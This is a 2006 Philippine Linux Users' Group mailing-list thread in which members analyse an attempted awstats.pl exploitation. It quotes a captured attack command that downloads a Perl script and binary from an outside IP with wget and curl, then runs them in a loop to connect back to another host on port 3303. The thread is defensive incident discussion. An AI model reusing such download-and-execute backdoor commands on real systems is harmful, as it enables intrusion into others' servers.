mmm...interesting. if youre still not at ease with it, better not to take the risk, simply remove it and get another or a new one.
-----Original Message----- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Happy Kamote Foundation Sent: Monday, May 08, 2006 8:54 AM To: Kelsey Hartigan-Go; Philippine Linux Users' Group (PLUG) Technical Discussion List Subject: Re: [plug] awstats.pl hi kelsey are you sure? better check things out because the ip is up, but i think he's just using a rundown webserver ;) yes, the links are not reachable. but the ip is. ;) -happy kamote On 5/8/06, Kelsey Hartigan-Go <[EMAIL PROTECTED]> wrote: > > attack wasn't successful. but me better take a better care for these > defaults left open. thanks. > > _____ Original message _____ > Subject: Re: [plug] awstats.pl > Author: "Happy Kamote Foundation" <[EMAIL PROTECTED]> > Date: 08th May 2006 11:42:9 > > > Obviously if awstats is properly configured/patched then it will not > run this process > > 6087 ? R 81:06 sh -c echo ;echo b_exp;wget http://219.84.105.36/ping > .txt;mv ping.txt temp2006;perl temp2006 220.227.100.4 3303;wget > http://219.84.10 5.36/ping;chmod +x ping;./ping 220.227.100.4 > 3303;curl -o ping > http://219.84.105 > .36/ping;chmod +x ping;./ping 220.227.100.4 3303;cd /tmp/;curl -o > temp2006 > http: > //219.84.105.36/ping.txt;while [ 1 ];do perl temp2006 220.227.100.4 > 3303;done;wg et http://219.84.105.36/ping;chmod +x ping;./ping > 220.227.100.4 3303;curl -o pin g http://219.84.105.36/ping;chmod +x > ping;./ping 220.227.100.4 3303;echo e_exp;% 00/awstats.w.x.y.z.conf > > and using a bit of common sense, you'll know that it had put in > something on your box which is particularly malicious. Let's try to > trim this down (since i have lots of time on my hands) > > - smells like a spawned sh shell. > > wget http://219.84.105.36/ping.txt > mv ping.txt temp2006 > perl temp2006 220.227.100.4 3303 : (smells like a backdoor) > > (oops this was unsuccessful, kiddie tries again using curl) cd /tmp/ > curl -o temp2006 http://219.84.105.36/ping.txt perl temp2006 > 220.227.100.4 3303;done;wg > > (oops! this was unsuccessful too! 3 is a charm! this time comes > precompiled *Grin*) > > > wget http://219.84.105.36/ping > chmod +x ping; > ./ping 220.227.100.4 3303 > > and so on and so forth.. ;) > > ;) > _________________________________________________ > Philippine Linux Users' Group (PLUG) Mailing List > [email protected] (#PLUG @ irc.free.net.ph) > > Read the Guidelines: http://linux.org.ph/lists Searchable Archives: > http://archives.free.net.ph > > _________________________________________________ > Philippine Linux Users' Group (PLUG) Mailing List > [email protected] (#PLUG @ irc.free.net.ph) Read the Guidelines: > http://linux.org.ph/lists Searchable Archives: > http://archives.free.net.ph > > _________________________________________________ Philippine Linux Users' Group (PLUG) Mailing List [email protected] (#PLUG @ irc.free.net.ph) Read the Guidelines: http://linux.org.ph/lists Searchable Archives: http://archives.free.net.ph -- No virus found in this incoming message. Checked by AVG Free Edition. Version: 7.1.392 / Virus Database: 268.5.5/333 - Release Date: 5/5/2006 -- No virus found in this incoming message. Checked by AVG Free Edition. Version: 7.1.392 / Virus Database: 268.5.5/333 - Release Date: 5/5/2006 -- No virus found in this outgoing message. Checked by AVG Free Edition. Version: 7.1.392 / Virus Database: 268.5.5/333 - Release Date: 5/5/2006 _________________________________________________ Philippine Linux Users' Group (PLUG) Mailing List [email protected] (#PLUG @ irc.free.net.ph) Read the Guidelines: http://linux.org.ph/lists Searchable Archives: http://archives.free.net.ph
